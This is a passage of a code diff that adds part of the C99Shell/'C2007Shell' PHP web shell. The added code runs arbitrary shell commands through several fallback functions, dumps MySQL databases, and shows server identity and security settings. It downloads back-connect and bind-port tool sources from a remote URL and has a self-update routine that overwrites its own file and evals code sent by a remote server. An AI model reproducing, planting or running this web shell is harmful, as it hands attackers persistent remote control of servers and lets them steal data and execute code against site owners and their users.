+  elseif (($result = `$cmd`) !== FALSE) {} 
+  elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} 
+  elseif (is_resource($fp = popen($cmd,"r"))) 
+  { 
+   $result = ""; 
+   while(!feof($fp)) {$result .= fread($fp,1024);} 
+   pclose($fp); 
+  } 
+ } 
+ return $result; 
+} 
+} 
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} 
+if (!function_exists("view_perms")) 
+{ 
+function view_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$type = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";} 
+ else {$type = "?";} 
+
+ $owner["read"] = ($mode & 00400)?"r":"-"; 
+ $owner["write"] = ($mode & 00200)?"w":"-"; 
+ $owner["execute"] = ($mode & 00100)?"x":"-"; 
+ $group["read"] = ($mode & 00040)?"r":"-"; 
+ $group["write"] = ($mode & 00020)?"w":"-"; 
+ $group["execute"] = ($mode & 00010)?"x":"-"; 
+ $world["read"] = ($mode & 00004)?"r":"-"; 
+ $world["write"] = ($mode & 00002)? "w":"-"; 
+ $world["execute"] = ($mode & 00001)?"x":"-"; 
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} 
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} 
+
+ return $type.join("",$owner).join("",$group).join("",$world); 
+} 
+} 
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}} 
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}} 
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}} 
+if (!function_exists("parse_perms")) 
+{ 
+function parse_perms($mode) 
+{ 
+ if (($mode & 0xC000) === 0xC000) {$t = "s";} 
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";} 
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";} 
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";} 
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";} 
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";} 
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";} 
+ else {$t = "?";} 
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; 
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; 
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; 
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); 
+} 
+} 
+if (!function_exists("parsesort")) 
+{ 
+function parsesort($sort) 
+{ 
+ $one = intval($sort); 
+ $second = substr($sort,-1); 
+ if ($second != "d") {$second = "a";} 
+ return array($one,$second); 
+} 
+} 
+if (!function_exists("view_perms_color")) 
+{ 
+function view_perms_color($o) 
+{ 
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} 
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} 
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";} 
+} 
+} 
+if (!function_exists("c99getsource")) 
+{ 
+function c99getsource($fn) 
+{ 
+ global $c99sh_sourcesurl; 
+ $array = array( 
+  "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", 
+  "c99sh_bindport.c" => "c99sh_bindport_c.txt", 
+  "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", 
+  "c99sh_backconn.c" => "c99sh_backconn_c.txt", 
+  "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", 
+  "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", 
+ ); 
+ $name = $array[$fn]; 
+ if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99sh_getupdate")) 
+{ 
+function c99sh_getupdate($update = TRUE) 
+{ 
+ $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; 
+ $data = @file_get_contents($url); 
+ if (!$data) {return "Can't connect to update-server!";} 
+ else 
+ { 
+  $data = ltrim($data); 
+  $string = substr($data,3,ord($data{2})); 
+  if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;} 
+  if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} 
+  if ($data{0} == "\x99" and $data{1} == "\x03") 
+  { 
+   $string = explode("\x01",$string); 
+   if ($update) 
+   { 
+    $confvars = array(); 
+    $sourceurl = $string[0]; 
+    $source = file_get_contents($sourceurl); 
+    if (!$source) {return "Can't fetch update!";} 
+    else 
+    { 
+     $fp = fopen(__FILE__,"w"); 
+     if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} 
+     else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} 
+    } 
+   } 
+   else {return "New version are available: ".$string[1];} 
+  } 
+  elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} 
+  else {return "Error in protocol: segmentation failed! (".$data.") ";} 
+ } 
+} 
+} 
+if (!function_exists("mysql_dump")) 
+{ 
+function mysql_dump($set) 
+{ 
+ global $shver; 
+ $sock = $set["sock"]; 
+ $db = $set["db"]; 
+ $print = $set["print"]; 
+ $nl2br = $set["nl2br"]; 
+ $file = $set["file"]; 
+ $add_drop = $set["add_drop"]; 
+ $tabs = $set["tabs"]; 
+ $onlytabs = $set["onlytabs"]; 
+ $ret = array(); 
+ $ret["err"] = array(); 
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} 
+ if (empty($db)) {$db = "db";} 
+ if (empty($print)) {$print = 0;} 
+ if (empty($nl2br)) {$nl2br = 0;} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (empty($file)) 
+ { 
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; 
+ } 
+ if (!is_array($tabs)) {$tabs = array();} 
+ if (empty($add_drop)) {$add_drop = TRUE;} 
+ if (sizeof($tabs) == 0) 
+ { 
+  // retrive tables-list 
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock); 
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} 
+ } 
+ $out = "# Dumped by C99Shell.SQL v. ".$shver." 
+# Home page: http://ccteam.ru 
+# 
+# Host settings: 
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." 
+# Date: ".date("d.m.Y H:i:s")." 
+# DB: \"".$db."\" 
+#--------------------------------------------------------- 
+"; 
+ $c = count($onlytabs); 
+ foreach($tabs as $tab) 
+ { 
+  if ((in_array($tab,$onlytabs)) or (!$c)) 
+  { 
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} 
+   // recieve query for create table structure 
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); 
+   if (!$res) {$ret["err"][] = mysql_smarterror();} 
+   else 
+   { 
+    $row = mysql_fetch_row($res); 
+    $out .= $row["1"].";\n\n"; 
+    // recieve table variables 
+    $res = mysql_query("SELECT * FROM `$tab`", $sock); 
+    if (mysql_num_rows($res) > 0) 
+    { 
+     while ($row = mysql_fetch_assoc($res)) 
+     { 
+      $keys = implode("`, `", array_keys($row)); 
+      $values = array_values($row); 
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+      $values = implode("', '", $values); 
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+      $out .= $sql; 
+     } 
+    } 
+   } 
+  } 
+ } 
+ $out .= "#---------------------------------------------------------------------------------\n\n"; 
+ if ($file) 
+ { 
+  $fp = fopen($file, "w"); 
+  if (!$fp) {$ret["err"][] = 2;} 
+  else 
+  { 
+   fwrite ($fp, $out); 
+   fclose ($fp); 
+  } 
+ } 
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} 
+ return $out; 
+} 
+} 
+if (!function_exists("mysql_buildwhere")) 
+{ 
+function mysql_buildwhere($array,$sep=" and",$functs=array()) 
+{ 
+ if (!is_array($array)) {$array = array();} 
+ $result = ""; 
+ foreach($array as $k=>$v) 
+ { 
+  $value = ""; 
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";} 
+  $value .= "'".addslashes($v)."'"; 
+  if (!empty($functs[$k])) {$value .= ")";} 
+  $result .= "`".$k."` = ".$value.$sep; 
+ } 
+ $result = substr($result,0,strlen($result)-strlen($sep)); 
+ return $result; 
+} 
+} 
+if (!function_exists("mysql_fetch_all")) 
+{ 
+function mysql_fetch_all($query,$sock) 
+{ 
+ if ($sock) {$result = mysql_query($query,$sock);} 
+ else {$result = mysql_query($query);} 
+ $array = array(); 
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;} 
+ mysql_free_result($result); 
+ return $array; 
+} 
+} 
+if (!function_exists("mysql_smarterror")) 
+{ 
+function mysql_smarterror($type,$sock) 
+{ 
+ if ($sock) {$error = mysql_error($sock);} 
+ else {$error = mysql_error();} 
+ $error = htmlspecialchars($error); 
+ return $error; 
+} 
+} 
+if (!function_exists("mysql_query_form")) 
+{ 
+function mysql_query_form() 
+{ 
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; 
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} 
+ if ((!$submit) or ($sql_act)) 
+ { 
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>"; 
+  if ($tbl_struct) 
+  { 
+   echo "<td valign=\"top\"><b>Fields:</b><br>"; 
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "� <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} 
+   echo "</td></tr></table>"; 
+  } 
+ } 
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} 
+} 
+} 
+if (!function_exists("mysql_create_db")) 
+{ 
+function mysql_create_db($db,$sock="") 
+{ 
+ $sql = "CREATE DATABASE `".addslashes($db)."`;"; 
+ if ($sock) {return mysql_query($sql,$sock);} 
+ else {return mysql_query($sql);} 
+} 
+} 
+if (!function_exists("mysql_query_parse")) 
+{ 
+function mysql_query_parse($query) 
+{ 
+ $query = trim($query); 
+ $arr = explode (" ",$query); 
+ /*array array() 
+ { 
+  "METHOD"=>array(output_type), 
+  "METHOD1"... 
+  ... 
+ } 
+ if output_type == 0, no output, 
+ if output_type == 1, no output if no error 
+ if output_type == 2, output without control-buttons 
+ if output_type == 3, output with control-buttons 
+ */ 
+ $types = array( 
+  "SELECT"=>array(3,1), 
+  "SHOW"=>array(2,1), 
+  "DELETE"=>array(1), 
+  "DROP"=>array(1) 
+ ); 
+ $result = array(); 
+ $op = strtoupper($arr[0]); 
+ if (is_array($types[$op])) 
+ { 
+  $result["propertions"] = $types[$op]; 
+  $result["query"]  = $query; 
+  if ($types[$op] == 2) 
+  { 
+   foreach($arr as $k=>$v) 
+   { 
+    if (strtoupper($v) == "LIMIT") 
+    { 
+     $result["limit"] = $arr[$k+1]; 
+     $result["limit"] = explode(",",$result["limit"]); 
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} 
+     unset($arr[$k],$arr[$k+1]); 
+    } 
+   } 
+  } 
+ } 
+ else {return FALSE;} 
+} 
+} 
+if (!function_exists("c99fsearch")) 
+{ 
+function c99fsearch($d) 
+{ 
+ global $found; 
+ global $found_d; 
+ global $found_f; 
+ global $search_i_f; 
+ global $search_i_d; 
+ global $a; 
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+ $h = opendir($d); 
+ while (($f = readdir($h)) !== FALSE) 
+ { 
+  if($f != "." && $f != "..") 
+  { 
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f)); 
+   if (is_dir($d.$f)) 
+   { 
+    $search_i_d++; 
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} 
+    if (!is_link($d.$f)) {c99fsearch($d.$f);} 
+   } 
+   else 
+   { 
+    $search_i_f++; 
+    if ($bool) 
+    { 
+     if (!empty($a["text"])) 
+     { 
+      $r = @file_get_contents($d.$f); 
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} 
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} 
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} 
+      else {$bool = strpos(" ".$r,$a["text"],1);} 
+      if ($a["text_not"]) {$bool = !$bool;} 
+      if ($bool) {$found[] = $d.$f; $found_f++;} 
+     } 
+     else {$found[] = $d.$f; $found_f++;} 
+    } 
+   } 
+  } 
+ } 
+ closedir($h); 
+} 
+} 
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} 
+//Sending headers 
+@ob_start(); 
+@ob_implicit_flush(0); 
+function onphpshutdown() 
+{ 
+ global $gzipencode,$ft; 
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) 
+ { 
+  $v = @ob_get_contents(); 
+  @ob_end_clean(); 
+  @ob_start("ob_gzHandler"); 
+  echo $v; 
+  @ob_end_flush(); 
+ } 
+} 
+function c99shexit() 
+{ 
+ onphpshutdown(); 
+ exit; 
+} 
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); 
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); 
+header("Cache-Control: no-store, no-cache, must-revalidate"); 
+header("Cache-Control: post-check=0, pre-check=0", FALSE); 
+header("Pragma: no-cache"); 
+if (empty($tmpdir)) 
+{ 
+ $tmpdir = ini_get("upload_tmp_dir"); 
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} 
+} 
+$tmpdir = realpath($tmpdir); 
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); 
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} 
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} 
+else {$tmpdir_logs = realpath($tmpdir_logs);} 
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") 
+{ 
+ $safemode = TRUE; 
+ $hsafemode = "<font color=red>ON (secure)</font>"; 
+} 
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} 
+$v = @ini_get("open_basedir"); 
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} 
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} 
+$sort = htmlspecialchars($sort); 
+if (empty($sort)) {$sort = $sort_default;} 
+$sort[1] = strtolower($sort[1]); 
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); 
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} 
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); 
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF 
+@ini_set("highlight.comment",$highlight_comment); //#FF8000 
+@ini_set("highlight.default",$highlight_default); //#0000BB 
+@ini_set("highlight.html",$highlight_html); //#000000 
+@ini_set("highlight.keyword",$highlight_keyword); //#007700 
+@ini_set("highlight.string",$highlight_string); //#DD0000 
+if (!is_array($actbox)) {$actbox = array();} 
+$dspact = $act = htmlspecialchars($act); 
+$disp_fullpath = $ls_arr = $notls = null; 
+$ud = urlencode($d); 
+?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - phpshell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b>C2007Shell v. <?php echo $shver; ?></b></font></a><font face=Webdings size=6><b>!</b></font></p>
+    </center></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>uname -a:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><p align="left"><b><?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?></b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php 
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} 
+$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); 
+if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} 
+$d = str_replace("\\\\","\\",$d); 
+$dispd = htmlspecialchars($d); 
+$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); 
+$i = 0; 
+foreach($pd as $b) 
+{ 
+ $t = ""; 
+ $j = 0; 
+ foreach ($e as $r) 
+ { 
+  $t.= $r.DIRECTORY_SEPARATOR; 
+  if ($j == $i) {break;} 
+  $j++; 
+ } 
+ echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; 
+ $i++; 
+} 
+echo "&nbsp;&nbsp;&nbsp;"; 
+if (is_writable($d)) 
+{ 
+ $wd = TRUE; 
+ $wdt = "<font color=green>[ ok ]</font>"; 
+ echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; 
+} 
+else 
+{ 
+ $wd = FALSE; 
+ $wdt = "<font color=red>[ Read-Only ]</font>"; 
+ echo "<b>".view_perms_color($d)."</b>"; 
+} 
+if (is_callable("disk_free_space")) 
+{ 
+ $free = disk_free_space($d); 
+ $total = disk_total_space($d); 
+ if ($free === FALSE) {$free = 0;} 
+ if ($total === FALSE) {$total = 0;} 
+ if ($free < 0) {$free = 0;} 
+ if ($total < 0) {$total = 0;} 
+ $used = $total-$free; 
+ $free_percent = round(100/($total/$free),2); 
+ echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; 
+} 
+echo "<br>"; 
+$letters = ""; 
+if ($win) 
+{ 
+ $v = explode("\\",$d); 
+ $v = $v[0]; 
+ foreach (range("a","z") as $letter) 
+ { 
+  $bool = $isdiskette = in_array($letter,$safemode_diskettes); 
+  if (!$bool) {$bool = is_dir($letter.":\\");} 
+  if ($bool) 
+  { 
+   $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; 
+   if ($letter.":" != $v) {$letters .= $letter;} 
+   else {$letters .= "<font color=green>".$letter."</font>";} 
+   $letters .= " ]</a> "; 
+  } 
+ } 
+ if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} 
+} 
+if (count($quicklaunch) > 0) 
+{ 
+ foreach($quicklaunch as $item) 
+ { 
+  $item[1] = str_replace("%d",urlencode($d),$item[1]); 
+  $item[1] = str_replace("%sort",$sort,$item[1]); 
+  $v = realpath($d.".."); 
+  if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} 
+  $item[1] = str_replace("%upd",urlencode($v),$item[1]); 
+  echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; 
+ } 
+} 
+echo "</p></td></tr></table><br>"; 
+if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} 
+echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; 
+if ($act == "") {$act = $dspact = "ls";} 
+if ($act == "sql") 
+{ 
+ $sql_surl = $surl."act=sql"; 
+ if ($sql_login)  {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} 
+ if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} 
+ if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} 
+ if ($sql_port)   {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} 
+ if ($sql_db)     {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} 
+ $sql_surl .= "&"; 
+ ?>
+    <h3>Attention! SQL-Manager is <u>NOT</u> ready module! Don't reports bugs.</h3>
+    <TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php 
+ if ($sql_server) 
+ { 
+  $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); 
+  $err = mysql_smarterror(); 
+  @mysql_select_db($sql_db,$sql_sock); 
+  if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} 
+ } 
+ else {$sql_sock = FALSE;} 
+ echo "<b>SQL Manager:</b><br>"; 
+ if (!$sql_sock) 
+ { 
+  if (!$sql_server) {echo "NO CONNECTION";} 
+  else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} 
+ } 
+ else 
+ { 
+  $sqlquicklaunch = array(); 
+  $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); 
+  $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); 
+  $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); 
+  $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); 
+  $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); 
+  $sqlquicklaunch[] = array("Logout",$surl."act=sql"); 
+  echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; 
+  if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} 
+  echo "</center>"; 
+ } 
+ echo "</td></tr><tr>"; 
+ if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"> i </font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<b>Please, fill the form:</b><table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="Adora" maxlength="64"></td><td><input type="password" name="sql_passwd" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } 
+ else 
+ { 
+  //Start left panel 
+  if (!empty($sql_db)) 
+  { 
